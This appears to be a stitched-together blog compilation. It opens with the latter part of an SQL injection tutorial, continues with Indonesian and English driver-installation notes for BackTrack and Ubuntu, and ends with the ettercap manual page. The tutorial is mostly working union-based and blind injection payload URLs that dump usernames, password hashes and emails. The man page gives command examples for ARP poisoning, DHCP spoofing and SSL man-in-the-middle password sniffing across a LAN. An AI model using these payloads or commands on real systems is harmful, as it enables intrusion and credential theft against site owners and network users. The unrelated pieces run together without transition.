http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
the first column is diplayed.
the second one (we change limit 0,1 to limit 1,1)
ie.
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
the second column is displayed, so keep incrementing until you get something like
username,user,login, password, pass, passwd etc…
if you wanna display column names for specific table use this query. (where clause)
let’s say that we found table users.
i.e
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name=’users’/*
now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.
Note that this won’t work if the magic quotes is ON.
let’s say that we found colums user, pass and email.
now to complete query to put them all together
for that we use concat() , i decribe it earlier.
i.e
http://www.site.com/news.php?id=5 union all select 1,concat(user,0×3a,pass,0×3a,email) from users/*
what we get here is user:pass:email from table users.
example: admin:hash:whatever@blabla.com
That’s all in this part, now we can proceed on harder part

2. Blind SQL Injection
Blind injection is a little more complicated the classic injection but it can be done
I must mention, there is very good blind sql injection tutorial by xprog, so it’s not bad to read it
Let’s start with advanced stuff.
I will be using our example
http://www.site.com/news.php?id=5
when we execute this, we see some page and articles on that page, pictures etc…
then when we want to test it for blind sql injection attack
http://www.site.com/news.php?id=5 and 1=1 <— this is always true
and the page loads normally, that’s ok.
now the real test
http://www.site.com/news.php?id=5 and 1=2 <— this is false
so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.

1) Get the MySQL version
to get the version in blind attack we use substring
i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5.

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works
when select don’t work then we use subselect
i.e
http://www.site.com/news.php?id=5 and (select 1)=1
if page loads normally then subselects work.
then we gonna see if we have access to mysql.user
i.e
http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.

3). Check table and column names
This is part when guessing is the best friend
i.e.
http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)
then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one
let’s say that we have found that table name is users, now what we need is column name.
the same as table name, we start guessing. Like i said before try the common names for columns.
i.e
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
if the page loads normally we know that column name is password (if we get false then try common names or just guess)
here we merge 1 with the column password, then substring returns the first character (,1,1)

4). Pull data from database
we found table users i columns username password so we gonna pull characters from that.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>80
ok this here pulls the first character from first user in table users.
substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value
and then compare it with simbol greater then > .
so if the ascii char greater then 80, the page loads normally. (TRUE)
we keep trying until we get false.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>95
we get TRUE, keep incrementing
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>98
TRUE again, higher
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>99
FALSE!!!
so the first character in username is char(99). Using the ascii converter we know that char(99) is letter ‘c’.
then let’s check the second character.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),2,1))>99
Note that i’m changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>99
TRUE, the page loads normally, higher.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>107
FALSE, lower number.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>104
TRUE, higher.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>105
FALSE!!!
we know that the second character is char(105) and that is ‘i’. We have ‘ci’ so far
so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).

There are some tools for Blind SQL Injection, i think sqlmap is the best, but i’m doing everything manually,
cause that makes you better SQL INJECTOR
Hope you learned something from this paper.
Have FUN!

source >> http://thehackerlounge.blogspot.com/2009/05/full-sql-injection-tutorial-mysql.html

[FIXED] INSTALL NVIDIA DRIVER ON BACKTRACK 5 R2

buka file blacklist.conf


 
vim /etc/modprobe.d/blacklist.conf

tambah line berikut :

 
blacklist vga16fb
blacklist nouveau
blacklist rivafb
blacklist nvidiafb
blacklist rivatv 
 
 
kemudian save
 
sudo apt-add-repository ppa:ubuntu-x-swat/x-updates
 
setelah itu update dan lakukan install driver Nvidia dari repository diatas:
 
 sudo apt-get update

sudo apt-get install nvidia-current
 
 Reboot, kemudian lakukan:
 
sudo su 
 
nvidia-xconfig
 
  reboot lagi... dan lihat hasilnya...
AMD ATI Catalyst 12.4 Display Driver di Ubuntu 12.04/11.10

AMD ATI Catalyst 12.4 Display Driver di Ubuntu 12.04/11.10

AMD Catalyst ™ 12,4 display driver proprietary Linux x86 telah di rillis. Rincian tentang AMD Catlayst 12,4 untuk Linux tidak banyak kami ketahu, tapi di sini ada beberapa fitur baru dan perbaikan dalam rilis terbaru:
  • Dukungan untuk Ubuntu 12,04
  • Beberapa masalah multi-head telah diperbaiki
  • Dukungan Linux PowerXpress untuk Intel platform Bridge Ivy
  • Beberapa perbaikan bug
Instalasi AMD Catalyst 12,4
Uninstall terlebih dahulu driver AMD yang telah terinstal dengan perintah:
sudo sh /usr/share/ati/fglrx-uninstall.sh
sudo apt-get remove --purge fglrx fglrx_* fglrx-amdcccle* fglrx-dev* xorg-driver-fglrx
Sekarang instalasi ATI Catalyst 12,4 dengan perintah-perintah di Ubuntu 12.04/11.10:

cd ~/; mkdir catalyst12.4; cd catalyst12.4/
 
 
wget http://www2.ati.com/drivers/linux/amd-driver-installer-12-3-x86.x86_64.run
chmod +x amd-driver-installer-12-3-x86.x86_64.run
sh ./amd-driver-installer-12-3-x86.x86_64.run
 
Kemudian ikuti instruksi instalasi:
amd catalyst driver 8 961 AMD ATI Catalyst 12.4 Display Driver di Ubuntu 12.04/11.10  tukangubuntu.com
Jalankan perintah ini untuk menyelesaikan instalasi:
 
sudo aticonfig --initial -f

Kemudian reboot sistem anda:

sudo reboot


reverensi >> 
http://www.tukangubuntu.com/amd-ati-catalyst-12-4-display-driver-di-ubuntu-12-0411-10.html

installing nvidia driver under ubuntu 12.04 beta 2

You can update your drivers with x-swat ppa and to install Nvidia card latest drivers use this ppa.

To install/Update Nvidia card drivers open Terminal (Press Alt+F2 and type: gnome-terminal) and copy the following commands in the terminal:
sudo apt-add-repository ppa:ubuntu-x-swat/x-updates
sudo apt-get update
sudo apt-get install nvidia-current
When installation complete restart your PC. Now to check the installation is successful Press Window/Super key and type: nvidia x server settings and open it.


source : >>> http://www.noobslab.com/2011/09/nvidia-drivers-for-ubuntu-1110-oneiric.html
Manual Reference Pages  - ETTERCAP

Manual Reference Pages - ETTERCAP


SYNOPSIS


ettercap [OPTIONS] [TARGET1] [TARGET2] TARGET is in the form MAC/IPs/PORTs
where IPs and PORTs can be ranges (e.g. /192.168.0.1-30,40,50/20,22,25)

DESCRIPTION

Ettercap was born as a sniffer for switched LAN (and obviously even "hubbed" ones), but during the development process it has gained more and more features that have changed it to a powerful and flexible tool for man-in-the-middle attacks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many features for network and host analysis (such as OS fingerprint). It has two main sniffing options:
UNIFIED, this method sniffs all the packets that pass on the cable. You can choose to put or not the interface in promisc mode (-p option). The packet not directed to the host running ettercap will be forwarded automatically using layer 3 routing. So you can use a mitm attack launched from a different tool and let ettercap modify the packets and forward them for you.
The kernel ip_forwarding is always disabled by ettercap. This is done to prevent to forward a packet twice (one by ettercap and one by the kernel). This is an invasive behaviour on gateways. So we recommend you to use ettercap on the gateways ONLY with the UNOFFENSIVE MODE ENABLED. Since ettercap listens only on one network interface, launching it on the gateway in offensive mode will not allow packets to be rerouted back from the second interface.
BRIDGED, it uses two network interfaces and forward the traffic from one to the other while performing sniffing and content filtering. This sniffing method is totally stealthy since there is no way to find that someone is in the middle on the cable. You can look at this method as a mitm attack at layer 1. You will be in the middle of the cable between two entities. Don’t use it on gateways or it will transform your gateway into a bridge. HINT: you can use the content filtering engine to drop packets that should not pass. This way ettercap will work as an inline IPS ;)
You can also perform man in the middle attacks while using the unified sniffing. You can choose the mitm attack that you prefer. The mitm attack module is independent from the sniffing and filtering process, so you can launch several attacks at the same time or use your own tool for the attack. The crucial point is that the packets have to arrive to ettercap with the correct mac address and a different ip address (only these packets will be forwarded).
The most relevant ettercap features are:
SSH1 support : you can sniff User and Pass, and even the data of an SSH1 connection. ettercap is the first software capable to sniff an SSH connection in FULL-DUPLEX
SSL support : you can sniff SSL secured data... a fake certificate is presented to the client and the session is decrypted.
Characters injection in an established connection : you can inject characters to the server (emulating commands) or to the client (emulating replies) maintaining the connection alive !!
Packet filtering/dropping: You can set up a filter script that searches for a particular string (even hex) in the TCP or UDP payload and replace it with yours or drop the entire packet. The filtering engine can match any field of the network protocols and modify whatever you want (see etterfilter(8)).
Remote traffic sniffing through tunnels and route mangling: You can play with linux cooked interfaces or use the integrated plugin to sniff tunneled or route-mangled remote connections and perform mitm attacks on them.
Plug-ins support : You can create your own plugin using the ettercap’s API.
Password collector for : TELNET, FTP, POP, RLOGIN, SSH1, ICQ, SMB, MySQL, HTTP, NNTP, X11, NAPSTER, IRC, RIP, BGP, SOCKS 5, IMAP 4, VNC, LDAP, NFS, SNMP, HALF LIFE, QUAKE 3, MSN, YMSG (other protocols coming soon...)
Passive OS fingerprint: you scan passively the lan (without sending any packet) and gather detailed info about the hosts in the LAN: Operating System, running services, open ports, IP, mac address and network adapter vendor.
Kill a connection: from the connections list you can kill all the connections you want

TARGET SPECIFICATION

There is no concept of SOURCE nor DEST. The two targets are intended to filter traffic coming from one to the other and vice-versa (since the connection is bidirectional). TARGET is in the form MAC/IPs/PORTs. If you want you can omit any of its parts and this will represent an ANY in that part.
e.g.
"//80" means ANY mac address, ANY ip and ONLY port 80
"/10.0.0.1/" means ANY mac address, ONLY ip 10.0.0.1 and ANY port
MAC must be unique and in the form 00:11:22:33:44:55
IPs is a range of IP in dotted notation. You can specify range with the - (hyphen) and single ip with , (comma). You can also use ; (semicolon) to indicate different ip addresses.
e.g.
"10.0.0.1-5;10.0.1.33" expands into ip 10.0.0.1, 2, 3, 4, 5 and 10.0.1.33
PORTs is a range of PORTS. You can specify range with the - (hyphen) and single port with , (comma).
e.g.
"20-25,80,110" expands into ports 20, 21, 22, 23, 24, 25, 80 and 110
NOTE:
you can reverse the matching of the TARGET by adding the -R option to the command line. So if you want to sniff ALL the traffic BUT the one coming or going to 10.0.0.1 you can specify "./ettercap -R /10.0.0.1/"
NOTE:
TARGETs are also responsible of the initial scan of the lan. You can use them to restrict the scan to only a subset of the hosts in the netmask. The result of the merging between the two targets will be scanned. remember that not specifying a target means "no target", but specifying "//" means "all the hosts in the subnet.


PRIVILEGES DROPPING

ettercap needs root privileges to open the Link Layer sockets. After the initialization phase, the root privs are not needed anymore, so ettercap drops them to UID = 65535 (nobody). Since ettercap has to write (create) log files, it must be executed in a directory with the right permissions (e.g. /tmp/). If you want to drop privs to a different uid, you can export the environment variable EC_UID with the value of the uid you want to drop the privs to (e.g. export EC_UID=500) or set the correct parameter in the etter.conf file.

SSL MITM ATTACK

While performing the SSL mitm attack, ettercap substitutes the real ssl certificate with its own. The fake certificate is created on the fly and all the fields are filled according to the real cert presented by the server. Only the issuer is modified and signed with the private key contained in the ’etter.sll.crt’ file. If you want to use a different private key you have to regenerate this file. To regenerate the cert file use the following commands: openssl genrsa -out etter.ssl.crt 1024
openssl req -new -key etter.ssl.crt -out tmp.csr
openssl x509 -req -days 1825 -in tmp.csr -signkey etter.ssl.crt -out tmp.new
cat tmp.new >> etter.ssl.crt
rm -f tmp.new tmp.csr NOTE: SSL mitm is not available (for now) in bridged mode.

OPTIONS

Options that make sense together can generally be combined. ettercap will warn the user about unsupported option combinations.
SNIFFING AND ATTACK OPTIONS
ettercap NG has a new unified sniffing method. This implies that ip_forwarding in the kernel is always disabled and the forwarding is done by ettercap. Every packet with destination mac address equal to the host’s mac address and destination ip address different for the one bound to the iface will be forwarded by ettercap. Before forwarding them, ettercap can content filter, sniff, log or drop them. It does not matter how these packets are hijacked, ettercap will process them. You can even use external programs to hijack packet.
You have full control of what ettercap should receive. You can use the internal mitm attacks, set the interface in promisc mode, use plugins or use every method you want. IMPORTANT NOTE: if you run ettercap on a gateway, remember to re-enable the ip_forwarding after you have killed ettercap. Since ettercap drops its privileges, it cannot restore the ip_forwarding for you.
-M, --mitm <METHOD:ARGS>
  MITM attack
This option will activate the man in the middle attack. The mimt attack is totally independent from the sniffing. The aim of the attack is to hijack packets and redirect them to ettercap. The sniffing engine will forward them if necessary.
You can choose the mitm attack that you prefer and also combine some of them to perform different attacks at the same time.
If a mitm method requires some parameters you can specify them after the colon. (e.g. -M dhcp:ip_pool,netmask,etc ) The following mitm attacks are available:
arp ([remote],[oneway])
  This method implements the ARP poisoning mitm attack. ARP requests/replies are sent to the victims to poison their ARP cache. Once the cache has been poisoned the victims will send all packets to the attacker which, in turn, can modify and forward them to the real destination. In silent mode (-z option) only the first target is selected, if you want to poison multiple target in silent mode use the -j option to load a list from a file.
You can select empty targets and they will be expanded as ’ANY’ (all the hosts in the LAN). The target list is joined with the hosts list (created by the arp scan) and the result is used to determine the victims of the attack.
The parameter "remote" is optional and you have to specify it if you want to sniff remote ip address poisoning a gateway. Indeed if you specify a victim and the gw in the TARGETS, ettercap will sniff only connection between them, but to enable ettercap to sniff connections that pass thru the gw, you have to use this parameter.
The parameter "oneway" will force ettercap to poison only from TARGET1 to TARGET2. Useful if you want to poison only the client and not the router (where an arp watcher can be in place).
Example:
the targets are: /10.0.0.1-5/ /10.0.0.15-20/
and the host list is: 10.0.0.1 10.0.0.3 10.0.0.16 10.0.0.18
the associations between the victims will be:
1 and 16, 1 and 18, 3 and 16, 3 and 18
if the targets overlap each other, the association with identical ip address will be skipped.
NOTE: if you manage to poison a client, you have to set correct routing table in the kernel specifying the GW. If your routing table is incorrect, the poisoned clients will not be able to navigate the Internet.

icmp (MAC/IP)
  This attack implements ICMP redirection. It sends a spoofed icmp redirect message to the hosts in the lan pretending to be a better route for internet. All connections to internet will be redirected to the attacker which, in turn, will forward them to the real gateway. The resulting attack is a HALF-DUPLEX mitm. Only the client is redirected, since the gateway will not accept redirect messages for a directly connected network. BE SURE TO NOT USE FILTERS THAT MODIFY THE PAYLOAD LENGTH. you can use a filter to modify packets, but the length must be the same since the tcp sequences cannot be updated in both ways.
You have to pass as argument the MAC and the IP address of the real gateway for the lan.
Obviously you have to be able to sniff all the traffic. If you are on a switch you have to use a different mitm attack such as arp poisoning. NOTE: to restrict the redirection to a given target, specify it as a TARGET
Example:
-M icmp:00:11:22:33:44:55/10.0.0.1
will redirect all the connections that pass thru that gateway.

dhcp (ip_pool/netmask/dns)
  This attack implements DHCP spoofing. It pretends to be a DHCP server and tries to win the race condition with the real one to force the client to accept the attacker’s reply. This way ettercap is able to manipulate the GW parameter and hijack all the outgoing traffic
Generated by the clients.
The resulting attack is a HALF-DUPLEX mitm. So be sure to use appropriate filters (see above in the ICMP section). You have to pass the ip pool to be used, the netmask and the ip of the dns server. Since ettercap tries to win the race with the real server, it DOES NOT CHECK if the ip is already assigned. You have to specify an ip pool of FREE addresses to be used. The ip pool has the same form of the target specification.
If the client sends a dhcp request (suggesting an ip address) ettercap will ack on that ip and modify only the gw option. If the client makes a dhcp discovery, ettercap will use the first unused ip address of the list you have specified on command line. Every discovery consumes an ip address. When the list is over, ettercap stops offering new ip addresses and will reply only to dhcp requests.
If you don’t want to offer any ip address, but only change the router information of dhcp request/ack, you can specify an empty ip_pool.
BIG WARNING: if you specify a list of ip that are in use, you will mess your network! In general, use this attack carefully. It can really mess things up! When you stop the attack, all the victims will be still convinced that ettercap is the gateway until the lease expires...
Example:
-M dhcp:192.168.0.30,35,50-60/255.255.255.0/192.168.0.1
reply to DHCP offer and request.
-M dhcp:/255.255.255.0/192.168.0.1
reply only to DHCP request.
port ([remote],[tree])
  This attack implements Port Stealing. This technique is useful to sniff in a switched environment when ARP poisoning is not effective (for example where static mapped ARPs are used). It floods the LAN (based on port_steal_delay option in etter.conf) with ARP packets. If you don’t specify the "tree" option, the destination MAC address of each "stealing" packet is the same as the attacker’s one (other NICs won’t see these packets), the source MAC address will be one of the MACs in the host list. This process "steals" the switch port of each victim host in the host list. Using low delays, packets destined to "stolen" MAC addresses will be received by the attacker, winning the race condition with the real port owner. When the attacker receives packets for "stolen" hosts, it stops the flooding process and performs an ARP request for the real destination of the packet. When it receives the ARP reply it’s sure that the victim has "taken back" his port, so ettercap can re-send the packet to the destination as is. Now we can re-start the flooding process waiting for new packets.
If you use the "tree" option, the destination MAC address of each stealing packet will be a bogus one, so these packets will be propagated to other switches (not only the directly connected one). This way you will be able to steal ports on other switches in the tree (if any), but you will generate a huge amount of traffic (according to port_steal_delay). The "remote" option has the same meaning as in "arp" mitm method.
When you stop the attack, ettercap will send an ARP request to each stolen host giving back their switch ports.
You can perform either HALF or FULL DUPLEX mitm according to target selection.
NOTE: Use this mitm method only on ethernet switches. Use it carefully, it could produce performances loss or general havoc.
NOTE: You can NOT use this method in only-mitm mode (-o flag), because it hooks the sniffing engine, and you can’t use interactive data injection.
NOTE: It could be dangerous to use it in conjunction with other mitm methods.
NOTE: This mitm method doesn’t work on Solaris and Windows because of the lipcap and libnet design and the lack of certain ioctl(). (We will feature this method on these OSes if someone will request it...)
Example:
The targets are: /10.0.0.1/ /10.0.0.15/
You will intercept and visualize traffic between 10.0.0.1 and 10.0.0.15, but you will receive all the traffic for 10.0.0.1 and 10.0.0.15 too.
The target is: /10.0.0.1/
You will intercept and visualize all the traffic for 10.0.0.1.



-o, --only-mitm
  This options disables the sniffing thread and enables only the mitm attack. Useful if you want to use ettercap to perform mitm attacks and another sniffer (such as ethereal) to sniff the traffic. Keep in mind that the packets are not forwarded by ettercap. The kernel will be responsible for the forwarding. Remember to activate the "ip forwarding" feature in your kernel.
-f, --pcapfilter <FILTER>
  Set a capturing filter in the pcap library. The format is the same as tcpdump(1). Remember that this kind of filter will not sniff packets out of the wire, so if you want to perform a mitm attack, ettercap will not be able to forward hijacked packets.
These filters are useful to decrease the network load impact into ettercap decoding module.
-B, --bridge <IFACE>
  BRIDGED sniffing
You need two network interfaces. ettercap will forward form one to the other all the traffic it sees. It is useful for man in the middle at the physical layer. It is totally stealthy since it is passive and there is no way for an user to see the attacker.
You can content filter all the traffic as you were a transparent proxy for the "cable".
OFF LINE SNIFFING
-r, --read <FILE>
  OFF LINE sniffing
With this option enabled, ettercap will sniff packets from a pcap compatible file instead of capturing from the wire.
This is useful if you have a file dumped from tcpdump or ethereal and you want to make an analysis (search for passwords or passive fingerprint) on it.
Obviously you cannot use "active" sniffing (arp poisoning or bridging) while sniffing from a file.
-w, --write <FILE>
  WRITE packet to a pcap file
This is useful if you have to use "active" sniffing (arp poison) on a switched LAN but you want to analyze the packets with tcpdump or ethereal. You can use this option to dump the packets to a file and then load it into your favourite application. NOTE: dump file collect ALL the packets disregarding the TARGET. This is done because you may want to log even protocols not supported by ettercap, so you can analyze them with other tools.
TIP: you can use the -w option in conjunction with the -r one. This way you will be able to filter the payload of the dumped packets or decrypt WEP-encrypted WiFi traffic and dump them to another file.

USER INTERFACES OPTIONS
-T, --text
  The text only interface, only printf ;)
It is quite interactive, press ’h’ in every moment to get help on what you can do.
-q, --quiet
  Quiet mode. It can be used only in conjunction with the console interface. It does not print packet content. It is useful if you want to convert pcap file to ettercap log files. example:
ettercap -Tq -L dumpfile -r pcapfile
-s, --script <COMMANDS>
  With this option you can feed ettercap with command as they were typed on the keyboard by the user. This way you can use ettercap within your favourite scripts. There is a special command you can issue thru this command: s(x). this command will sleep for x seconds. example:
ettercap -T -s ’lq’ will print the list of the hosts and exit
ettercap -T -s ’s(300)olqq’ will collect the infos for 5 minutes, print the list of the local profiles and exit

-C, --curses
  Ncurses based GUI. See ettercap_curses(8) for a full description.
-G, --gtk The nice GTK2 interface (thanks Daten...).
-D, --daemonize
  Daemonize ettercap. This option will detach ettercap from the current controlling terminal and set it as a daemon. You can combine this feature with the "log" option to log all the traffic in the background. If the daemon fails for any reason, it will create the file "./ettercap_daemonized.log" in which the error caught by ettercap will be reported. Furthermore, if you want to have a complete debug of the daemon process, you are encouraged to recompile ettercap in debug mode.

GENERAL OPTIONS
-i, --iface <IFACE>
  Use this <IFACE> instead of the default one. The interface can be unconfigured (requires libnet >= 1.1.2), but in this case you cannot use MITM attacks and you should set the unoffensive flag.
-I, --iflist
  This option will print the list of all available network interfaces that can be used within ettercap. The option is particulary usefull under windows where the name of the interface is not so obvious as under *nix.
-n, --netmask <NETMASK>
  Use this <NETMASK> instead of the one associated with the current iface. This option is useful if you have the NIC with an associated netmask of class B and you want to scan (with the arp scan) only a class C.
-R, --reversed
  Reverse the matching in the TARGET selection. It means not(TARGET). All but the selected TARGET.
-t, --proto <PROTO>
  Sniff only PROTO packets (default is TCP + UDP).
This is useful if you want to select a port via the TARGET specification but you want to differentiate between tcp or udp.
PROTO can be "tcp", "udp" or "all" for both.
-z, --silent
  Do not perform the initial ARP scan of the LAN. NOTE: you will not have the hosts list, so you can’t use the multipoison feature. you can only select two hosts for an ARP poisoning attack, specifying them through the TARGETs
-p, --nopromisc
  Usually, ettercap will put the interface in promisc mode to sniff all the traffic on the wire. If you want to sniff only your connections, use this flag to NOT enable the promisc mode.
-u, --unoffensive
  Every time ettercap starts, it disables ip forwarding in the kernel and begins to forward packets itself. This option prevent to do that, so the responsibility of ip forwarding is left to the kernel.
This options is useful if you want to run multiple ettercap instances. You will have one instance (the one without the -u option) forwarding the packets, and all the other instances doing their work without forwarding them. Otherwise you will get packet duplicates.
It also disables the internal creation of the sessions for each connection. It increases performances, but you will not be able to modify packets on the fly.
If you want to use a mitm attack you have to use a separate instance.
You have to use this option if the interface is unconfigured (without an ip address.)
This is also useful if you want to run ettercap on the gateway. It will not disable the forwarding and the gateway will correctly route the packets.
-j, --load-hosts <FILENAME>
  It can be used to load a hosts list from a file created by the -k option. (see below)
-k, --save-hosts <FILENAME>
  Saves the hosts list to a file. Useful when you have many hosts and you don’t want to do an ARP storm at startup any time you use ettercap. Simply use this options and dump the list to a file, then to load the information from it use the -j <filename> option.
-P, --plugin <PLUGIN>
  Run the selected PLUGIN. Many plugins need target specification, use TARGET as always.
In console mode (-C option), standalone plugins are executed and then the application exits. Hook plugins are activated and the normal sniffing is performed.
To have a list of the available external plugins use "list" (without quotes) as plugin name (e.g. ./ettercap -P list). NOTE: you can also activate plugins directly from the interfaces (always press "h" to get the inline help)
More detailed info about plugins and about how to write your own are found in the man page ettercap_plugin(8)
-F, --filter <FILE>
  Load the filter from the file <FILE>. The filter must be compiled with etterfilter(8). The utility will compile the filter script and produce an ettercap-compliant binary filter file. Read the etterfilter(8) man page for the list of functions you can use inside a filter script.
NOTE: these filters are different from those set with --pcapfilter. An ettercap filter is a content filter and can modify the payload of a packet before forwarding it. Pcap filter are used to capture only certain packets.
NOTE: you can use filters on pcapfile to modify them and save to another file, but in this case you have to pay attention on what you are doing, since ettercap will not recalculate checksums, nor split packets exceeding the mtu (snaplen) nor anything like that.
-W, --wep-key <KEY>
  You can specify a WEP key to decrypt WiFi packets. Only the packets decrypted successfully will be passed to the decoders stack, the others will be skipped with a message.
The parameter has the following syntax: N:T:KEY. Where N is the bit length of the wep key (64, 128 or 256), T is the type of the string (’s’ for string and ’p’ for passphrase). KEY can be a string or an escaped hex sequences. example:
--wep-key 128:p:secret
--wep-key 128:s:ettercapwep0
--wep-key ’64:s:\x01\x02\x03\x04\x05’
-a, --config <CONFIG>
  Loads an alternative config file instead of the default in /etc/etter.conf. This is useful if you have many preconfigured files for different situations.

VISUALIZATION OPTIONS
 
-e, --regex <REGEX>
  Handle only packets that match the regex.
This option is useful in conjunction with -L. It logs only packets that match the posix regex REGEX.
It impacts even the visualization of the sniffed packets. If it is set only packets matching the regex will be displayed.
-V, --visual <FORMAT>
  Use this option to set the visualization method for the packets to be displayed. FORMAT may be one of the following:


hex Print the packets in hex format. example:
the string "HTTP/1.1 304 Not Modified" becomes:
0000: 4854 5450 2f31 2e31 2033 3034 204e 6f74 HTTP/1.1 304 Not
0010: 204d 6f64 6966 6965 64 Modified
ascii Print only "printable" characters, the others are displayed as dots ’.’
text Print only the "printable" characters and skip the others.
ebcdic Convert an EBCDIC text to ASCII.
html Strip all the html tags from the text. A tag is every string between < and >. example:
<title>This is the title</title>, but the following <string> will not be displayed.
This is the title, but the following will not be displayed.
utf8 Print the packets in UTF-8 format. The encoding used while performing the conversion is declared in the etter.conf(5) file.

-d, --dns Resolve ip addresses into hostnames. NOTE: this may seriously slow down ettercap while logging passive information. Every time a new host is found, a query to the dns is performed. Ettercap keeps a cache for already resolved host to increase the speed, but new hosts need a new query and the dns may take up to 2 or 3 seconds to respond for an unknown host.
HINT: ettercap collects the dns replies it sniffs in the resolution table, so even if you specify to not resolve the hostnames, some of them will be resolved because the reply was previously sniffed. think about it as a passive dns resolution for free... ;)
-E, --ext-headers
  Print extended headers for every displayed packet. (e.g. mac addresses)
-Q, --superquiet
  Super quiet mode. Do not print users and passwords as they are collected. Only store them in the profiles. It can be useful to run ettercap in text only mode but you don’t want to be flooded with dissectors messages. Useful when using plugins because the sniffing process is always active, it will print all the collected infos, with this option you can suppress these messages.
NOTE: this options automatically sets the -q option. example:
ettercap -TzQP finger /192.168.0.1/22



LOGGING OPTIONS
-L, --log <LOGFILE>
  Log all the packets to binary files. These files can be parsed by etterlog(8) to extract human readable data. With this option, all packets sniffed by ettercap will be logged, together with all the passive info (host info + user & pass) it can collect. Given a LOGFILE, ettercap will create LOGFILE.ecp (for packets) and LOGFILE.eci (for the infos). NOTE: if you specify this option on command line you don’t have to take care of privileges since the log file is opened in the startup phase (with high privs). But if you enable the log option while ettercap is already started, you have to be in a directory where uid = 65535 or uid = EC_UID can write.
NOTE: the logfiles can be compressed with the deflate algorithm using the -c option.
-l, --log-info <LOGFILE>
  Very similar to -L but it logs only passive information + users and passwords for each host. The file will be named LOGFILE.eci
-m, --log-msg <LOGFILE>
  It stores in <LOGFILE> all the user messages printed by ettercap. This can be useful when you are using ettercap in daemon mode or if you want to track down all the messages. Indeed, some dissectors print messages but their information is not stored anywhere, so this is the only way to keep track of them.
-c, --compress
  Compress the logfile with the gzip algorithm while it is dumped. etterlog(8) is capable of handling both compressed and uncompressed log files.
-o, --only-local
  Stores profiles information belonging only to the LAN hosts. NOTE: this option is effective only against the profiles collected in memory. While logging to a file ALL the hosts are logged. If you want to split them, use the related etterlog(8) option.
-O, --only-remote
  Stores profiles information belonging only to remote hosts.


STANDARD OPTIONS
-U, --update
  Connects to the ettercap website (ettercap.sf.net) and retrieve the latest databases used by ettercap.
If you want only to check if an update is available, prepend the -z option. The order does matter: ettercap -zU SECURITY NOTE: The updates are not signed so an attacker may poison your DNS server and force the updateNG.php to feed ettercap with fake databases. This can harm to your system since it can overwrite any file containing the string "Revision: ".

-v, --version
  Print the version and exit.
-h, --help prints the help screen with a short summary of the available options.


EXAMPLES

Here are some examples of using ettercap.
ettercap -Tp
  Use the console interface and do not put the interface in promisc mode. You will see only your traffic.
ettercap -Tzq
  Use the console interface, do not ARP scan the net and be quiet. The packet content will not be displayed, but user and passwords, as well as other messages, will be displayed.
ettercap -T -j /tmp/victims -M arp /10.0.0.1-7/ /10.0.0.10-20/
  Will load the hosts list from /tmp/victims and perform an ARP poisoning attack against the two target. The list will be joined with the target and the resulting list is used for ARP poisoning.
ettercap -T -M arp // //
  Perform the ARP poisoning attack against all the hosts in the LAN. BE CAREFUL !!
ettercap -T -M arp:remote /192.168.1.1/ /192.168.1.2-10/
  Perform the ARP poisoning against the gateway and the host in the lan between 2 and 10. The ’remote’ option is needed to be able to sniff the remote traffic the hosts make through the gateway.
ettercap -Tzq //110
  Sniff only the pop3 protocol from every hosts.
ettercap -Tzq /10.0.0.1/21,22,23
  Sniff telnet, ftp and ssh connections to 10.0.0.1.
ettercap -P list
  Prints the list of all available plugins

AUTHORS

Alberto Ornaghi (ALoR) <alor@users.sf.net>
Marco Valleri (NaGA) <naga@antifork.org>

SEE ALSO

etter.conf(5) ettercap_curses(8) ettercap_plugins(8) etterlog(8) etterfilter(8)

AVAILABILITY

http://ettercap.sourceforge.net/download/

CVS

cvs -d:pserver:anonymous@cvs.ettercap.sf.net:/cvsroot/ettercap login
cvs -d:pserver:anonymous@cvs.ettercap.sf.net:/cvsroot/ettercap co ettercap_ng

BUGS

Our software never has bugs.
It just develops random features. ;) KNOWN-BUGS
- ettercap doesn’t handle fragmented packets... only the first segment will be displayed by the sniffer. However all the fragments are correctly forwarded.
+ please send bug-report, patches or suggestions to <alor@users.sourceforge.net> or visit http://ettercap.sourceforge.net/forum/ and post it in the BUGS section.
+ to report a bug, follow the instructions in the README.BUGS file

PHILOLOGICAL HISTORY

